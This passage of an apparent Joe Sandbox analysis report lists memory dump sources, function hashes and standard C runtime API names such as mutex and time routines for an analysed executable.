                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __freea
                                                                                                                                                                                                                                                  • String ID: bZ+,
                                                                                                                                                                                                                                                  • API String ID: 240046367-2515065464
                                                                                                                                                                                                                                                  • Opcode ID: e8286ce14a0efc5f330f718bb47eccb5224ddf4089ff113b2743a0a698ae6417
                                                                                                                                                                                                                                                  • Instruction ID: 69879637f24f3f3d7b5935311782e56164f9beca38035ffe848b277dfcab14e4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8286ce14a0efc5f330f718bb47eccb5224ddf4089ff113b2743a0a698ae6417
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D251C572A00216AFDB319F54DC41FBB3AA9DF85760F15812AFD08D7141EB34EC50AAA2
                                                                                                                                                                                                                                                  Function 00F33AC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __Mtx_destroy_in_situ.LIBCPMT ref: 00F33B93
                                                                                                                                                                                                                                                  • __Cnd_destroy_in_situ.LIBCPMT ref: 00F33B99
                                                                                                                                                                                                                                                  • __Mtx_destroy_in_situ.LIBCPMT ref: 00F33BA2
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Mtx_destroy_in_situ$Cnd_destroy_in_situ
                                                                                                                                                                                                                                                  • String ID: bZ+,
                                                                                                                                                                                                                                                  • API String ID: 3308344742-2515065464
                                                                                                                                                                                                                                                  • Opcode ID: 666f969fe75e15c723a94cb90f18b948b68adacf7bde9c5ec57e64f51ff16b6d
                                                                                                                                                                                                                                                  • Instruction ID: 4129193134c3999d2e6d31eaff7b02b7be9b8a7855bd5123d61507c6721c6767
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 666f969fe75e15c723a94cb90f18b948b68adacf7bde9c5ec57e64f51ff16b6d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1751C371A007049FDB24DF29C884B6AF7E4EB44730F148A5DE45AC7791DB38E900DB90
                                                                                                                                                                                                                                                  Function 00F4C452 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _xtime_get$Xtime_diff_to_millis2
                                                                                                                                                                                                                                                  • String ID: bZ+,
                                                                                                                                                                                                                                                  • API String ID: 2858396081-2515065464
                                                                                                                                                                                                                                                  • Opcode ID: 5506bbf2afb729b6d7e9e7ff4bd70975d50da4b421347669493c9fb20c41b587
                                                                                                                                                                                                                                                  • Instruction ID: 2fbe74ac7ff52ef3ebaeb97d9f861ef17fe5b43b2a34e1e6f20234d1b66aad48
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5506bbf2afb729b6d7e9e7ff4bd70975d50da4b421347669493c9fb20c41b587
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27516E71A02116CBCF60DF24C9919BD7BB4EF04720B28645ADC06AB256DB34FD41EBE4
                                                                                                                                                                                                                                                  Function 00F332D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                                                                                                  • String ID: bZ+,
                                                                                                                                                                                                                                                  • API String ID: 32384418-2515065464
                                                                                                                                                                                                                                                  • Opcode ID: a9fdbb71878ae63f334acc916dadf38ee1b37cc59c363cbfdec2d38b20e41850
                                                                                                                                                                                                                                                  • Instruction ID: 00eab0ccff2780654b4153e5f68d06f971f442caace21ed7e09702b4a2f15a0e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9fdbb71878ae63f334acc916dadf38ee1b37cc59c363cbfdec2d38b20e41850
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E412571E05604ABDB20DB69DD05B9BBBF8EF55730F00817AEC0593641EB78AA04D6E1
                                                                                                                                                                                                                                                  Function 00F6CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
